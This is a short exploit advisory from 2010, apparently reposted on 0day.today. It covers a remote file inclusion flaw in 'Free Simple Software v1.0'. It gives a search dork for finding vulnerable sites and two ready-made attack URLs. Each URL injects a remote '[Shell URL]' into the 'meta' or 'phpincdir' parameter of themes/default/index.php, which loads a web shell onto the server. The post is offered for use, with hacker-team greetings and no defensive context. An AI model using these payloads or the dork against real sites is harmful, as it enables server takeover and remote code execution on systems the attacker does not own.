id: 13731
date: 08/17/2010
title: Free Simple Software v1.0 Remote File Inclusion Vulnerability
author: Dr.$audi
cves: 

=============================================================
Free Simple Software v1.0 Remote File Inclusion Vulnerability
=============================================================

########################################################
###  Free Simple Software V1.0  ###                                                 
#By :  Dr.$audi  ( SauDi ViRuS TeaM )                                           
#By : http://Sa-ViRuS.CoM                                                       
#Email : Mon7b6@Gmail.com        
#Dork: Powered by free simple software                                              
#Greets : RENO , Dr.php , ! BaD BoY ! , Gov.HaCkEr , Mind , AnTi SeCuRe
########################################################
Script HomePage: www.freesimplesoft.com                   #
########################################################
#RFI:                                                                                                    
# http://site/path/themes/default/index.php?meta=[Shell URL]?
# http://site/path/themes/default/index.php?phpincdir=[Shell URL]?
########################################################



#  0day.today [2023-03-25]  #